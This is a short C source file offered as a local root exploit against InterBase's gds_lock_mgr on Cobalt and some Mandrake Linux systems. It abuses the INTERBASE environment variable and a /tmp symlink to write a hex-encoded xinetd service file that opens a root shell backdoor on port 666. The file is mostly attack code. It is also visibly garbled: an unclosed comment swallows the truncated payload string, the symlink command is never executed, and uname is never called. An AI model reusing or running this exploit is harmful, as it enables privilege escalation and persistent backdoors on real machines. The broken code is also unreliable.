// gds_lock_mgr easy local root compromise
// All cobalt Linux affected, and certain mandrake installations.
// Wouter ter Maat aka grazer - http://www.i-security.nl

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/utsname.h>

#define BDPATH "/etc/xinetd.d/xinetdbd"
#define GDSBIN "/opt/interbase/bin/gds_lock_mgr"

int main() {

struct utsname buf;
char path[24], lnc[34];
FILE *fd;

/* check for a rootshell on port 666 after the machine has rebooted.
 * exploit written to work on a raq550 using xinetd

char *hexbd = "\x73\x65\x72\x76\x69\x63\x65\x20\x78\x69\x6e\x65\x74\x64"

fprintf(stdout, "*** gds_lock_mgr local root exploit - grazer ***\n");

setenv("INTERBASE", "/tmp", 1); 
sprintf(path, "%s", "/tmp/isc_init1.");
strcat(path, buf.nodename);


sprintf(lnc, "ln %s -s %s", BDPATH, path);

if(fd=fopen(GDSBIN, "r")) {
system(GDSBIN); close(fd); }
else {
fprintf(stderr, "%s not found...\n", GDSBIN); 
exit(0); }

if(fd=fopen(BDPATH, "w")) { 
fprintf(stderr,"     exploit succesfull...\n");
fprintf(fd, "%s", hexbd); close(fd);}
else {
fprintf(stderr, "exploit failed...\n"); 
exit(0); }
